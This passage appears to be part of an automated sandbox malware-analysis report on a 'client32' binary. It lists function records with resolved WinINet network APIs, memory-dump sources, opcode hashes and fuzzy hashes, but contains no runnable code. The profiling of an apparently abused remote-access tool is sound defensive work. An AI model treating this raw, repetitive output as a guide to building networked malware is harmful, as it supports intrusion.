                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 175691280-2052047905
                                                                                                                        • Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                        • Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
                                                                                                                        • Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                        • Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 68594C84
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68594CBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetConnectA
                                                                                                                        • API String ID: 199729137-3259999732
                                                                                                                        • Opcode ID: 830954cbed1c9144f6a3e8e6539191faf960695e30a89be9ba93378ba3d2f690
                                                                                                                        • Instruction ID: 5d831db985c50f7d966cd4c67251dfeba661d74cfba861112c59a7c4d6ed8f97
                                                                                                                        • Opcode Fuzzy Hash: 830954cbed1c9144f6a3e8e6539191faf960695e30a89be9ba93378ba3d2f690
                                                                                                                        • Instruction Fuzzy Hash: 4EF01472610618AFCB20DFA8D844E9BB7E8EB8C711F01861AF919D3240D630EC11CFA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 68594E34
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68594E6D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: HttpOpenRequestA
                                                                                                                        • API String ID: 199729137-1149044843
                                                                                                                        • Opcode ID: 1c8570bd4916be9700ae4b1e1f0dc0c05ceafc9a6992f85010464a5eb1ad4d85
                                                                                                                        • Instruction ID: 3259aee81dddc5ee95019deda423f274853b4f5c0a502156a7870dbdbfb7a394
                                                                                                                        • Opcode Fuzzy Hash: 1c8570bd4916be9700ae4b1e1f0dc0c05ceafc9a6992f85010464a5eb1ad4d85
                                                                                                                        • Instruction Fuzzy Hash: 9BF04972610618AFCB10DF98D884E9B77E8EF8C711F41851AFD29D3240D630EC51CBA0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wvsprintf
                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                        • Opcode ID: e326bd9eea96bac73fc01c109a361f52e4cb0ee9fba3d42dc8b7c2656caf18f7
                                                                                                                        • Instruction ID: 9a882c9afa223aba9d2d34692fe154f7792eefcd4734c275cc3d0534e1e4a9f7
                                                                                                                        • Opcode Fuzzy Hash: e326bd9eea96bac73fc01c109a361f52e4cb0ee9fba3d42dc8b7c2656caf18f7
                                                                                                                        • Instruction Fuzzy Hash: 72F04476900118BBCB00DA98DC40AFEBBA99B85204F404199EA09A7140DB306E4587A5
                                                                                                                        APIs
                                                                                                                        • wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                        • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                        • API String ID: 175691280-2052047905
                                                                                                                        • Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                        • Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
                                                                                                                        • Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                        • Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685B3B5E: __getptd.LIBCMT ref: 685B3B64
                                                                                                                          • Part of subcall function 685B3B5E: __getptd.LIBCMT ref: 685B3B74
                                                                                                                        • __getptd.LIBCMT ref: 685BA979
                                                                                                                          • Part of subcall function 685B6F64: __getptd_noexit.LIBCMT ref: 685B6F67
                                                                                                                          • Part of subcall function 685B6F64: __amsg_exit.LIBCMT ref: 685B6F74
                                                                                                                        • __getptd.LIBCMT ref: 685BA987
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                        • Opcode ID: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
                                                                                                                        • Instruction ID: 0a6d87f664127e5c6888d0283175262549a19f15d066d2a150c10dab66bacf6b
                                                                                                                        • Opcode Fuzzy Hash: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
                                                                                                                        • Instruction Fuzzy Hash: EC014B39802384CECB269F25D466BBCB3B6BF20215FD1442ED4A166690EB308D84EB91
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 68594B04
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68594B31
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetOpenA
                                                                                                                        • API String ID: 199729137-3658917949
                                                                                                                        • Opcode ID: 1a939df4539ed5fda9b0227a7b835f74ef9f6656686b518e5def76d83d8dcfa9
                                                                                                                        • Instruction ID: 4075bdc7f060023ca68e93a22658de0ed33f96b985c3faad440cf37d02b4e267
                                                                                                                        • Opcode Fuzzy Hash: 1a939df4539ed5fda9b0227a7b835f74ef9f6656686b518e5def76d83d8dcfa9
                                                                                                                        • Instruction Fuzzy Hash: 0EF05E72604218AFCB10EFA8D844EAB77A9EF4C721F40851AFE19D7200D670EC10CFA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 68594CE4
                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,6859B4D8,00000000), ref: 68594D11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetErrorDlg
                                                                                                                        • API String ID: 199729137-3951532234
                                                                                                                        • Opcode ID: 12c0de2993450cc17055f95d9a5ad7d30ffb7a56117e2b6124ac411c16e0a659
                                                                                                                        • Instruction ID: 7972de36393e1d260071a436ffb998e5433940cb293b89376e392852070acd64
                                                                                                                        • Opcode Fuzzy Hash: 12c0de2993450cc17055f95d9a5ad7d30ffb7a56117e2b6124ac411c16e0a659
                                                                                                                        • Instruction Fuzzy Hash: 76F05E76641718AFCB10DF98D844EAB77ECEB48B21F40851AFE1997201C770EC50CBA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 68594EE4
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6859B3E2,00000000,00000000,00000000,00000000,00000000), ref: 68594F11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: HttpSendRequestA
                                                                                                                        • API String ID: 199729137-4278235638
                                                                                                                        • Opcode ID: be6f82efae27c42d33fc735e13b726965d6b5a88b883a2f53884dc81059e8f37
                                                                                                                        • Instruction ID: 086abdd35253e42db8f6821e2ea9f64691ca82b8908e1d1f03f69074cd61c358
                                                                                                                        • Opcode Fuzzy Hash: be6f82efae27c42d33fc735e13b726965d6b5a88b883a2f53884dc81059e8f37
                                                                                                                        • Instruction Fuzzy Hash: 27F03076640318AFC720DFA8D844D9B77A8EB48711F41891AFD1597200D770E854CBE0
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 68594E94
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6859B421,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68594EC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: HttpQueryInfoA
                                                                                                                        • API String ID: 199729137-45432230
                                                                                                                        • Opcode ID: 49cd550e5366f84bc8e0030a3eca37c820dcf5802ab93257dd3a5aed57e56bd4
                                                                                                                        • Instruction ID: 1d5077fe36949f0c46a527b14fbbff9f4b4e893b883f5e891f31956b6c5c03ce
                                                                                                                        • Opcode Fuzzy Hash: 49cd550e5366f84bc8e0030a3eca37c820dcf5802ab93257dd3a5aed57e56bd4
                                                                                                                        • Instruction Fuzzy Hash: AFF03A72A50228AFCB10DF99D848E9B77A8EF48721F40C41ABD69D7200D670E8508BA1
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 68594F34
                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6859B614), ref: 68594F61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: HttpSendRequestExA
                                                                                                                        • API String ID: 199729137-1584202490
                                                                                                                        • Opcode ID: 843b7ffc316a958f94a90fea1431fde08f668c9f2ed2f60bf0b2962fded3323f
                                                                                                                        • Instruction ID: 54bded41a36acfd5e9877644620938bcf6cde8d2d0204237e76dcd5a7ce569f2
                                                                                                                        • Opcode Fuzzy Hash: 843b7ffc316a958f94a90fea1431fde08f668c9f2ed2f60bf0b2962fded3323f
                                                                                                                        • Instruction Fuzzy Hash: 47F03A72611218AFCB20EF98E844EAB77A9EB48B61F40851AFD19D7200D670E8108BF1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A6FDE
                                                                                                                        • ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 685A7018
                                                                                                                          • Part of subcall function 685A62B0: _memset.LIBCMT ref: 685A62F6
                                                                                                                          • Part of subcall function 685A62B0: SetLastError.KERNEL32(00000057), ref: 685A65A3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$ErrorLastctl_pittmanfunc
                                                                                                                        • String ID: P
                                                                                                                        • API String ID: 2926529296-3110715001
                                                                                                                        • Opcode ID: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                                        • Instruction ID: c71df5102dbccd8cab67c8c91b709086a3674d9203fc8fc5a1f4de7564754f37
                                                                                                                        • Opcode Fuzzy Hash: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
                                                                                                                        • Instruction Fuzzy Hash: A4F0BDB5A4030CABDF14CFD4DC82FAE77B9AB48700F104119FA18AB3C4D7B0A9108BA5
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68594B54
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68594B7D
                                                                                                                        Strings
                                                                                                                        • InternetQueryDataAvailable, xrefs: 68594B4E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetQueryDataAvailable
                                                                                                                        • API String ID: 199729137-452555236
                                                                                                                        • Opcode ID: 5f02af7f4d7dc83bee59837814a22186f1d940bbd71c855ffc528cfc155dbd84
                                                                                                                        • Instruction ID: 1d06a72440f85685e28a699fea80b8ea35f5f9f29c9bc158c4639bb2dbe601f8
                                                                                                                        • Opcode Fuzzy Hash: 5f02af7f4d7dc83bee59837814a22186f1d940bbd71c855ffc528cfc155dbd84
                                                                                                                        • Instruction Fuzzy Hash: B9F05E72615218AFCB60DF94D944E9B77A8EB48721F40441AFD55D7640C670F8108FA4
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68594BF4
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 68594C1D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                        • String ID: InternetReadFile
                                                                                                                        • API String ID: 199729137-1824561397
                                                                                                                        • Opcode ID: 171890c2d46719c68e062ee8231ae023f816c0bb4ff5e3c6d71c6ac619cdb34e
